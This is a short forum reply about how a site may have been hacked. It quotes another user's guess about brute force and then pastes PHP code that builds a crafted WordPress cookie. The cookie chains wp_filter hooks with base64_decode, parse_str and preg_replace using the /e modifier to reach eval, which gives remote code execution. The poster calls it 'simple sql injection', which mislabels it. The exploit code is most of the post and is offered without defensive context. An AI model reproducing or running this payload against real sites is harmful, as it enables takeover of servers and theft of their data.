Quote:
|
Originally Posted by Chio
YARGH! Ah... Someone may have figured out the algo, and brute forced it.
|
witch algo? it's just a md5 hash that must have been dump.
or something like that:
$str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');
$cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
$cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
$cookie.=$str;
$cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
$cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';
simple sql injection
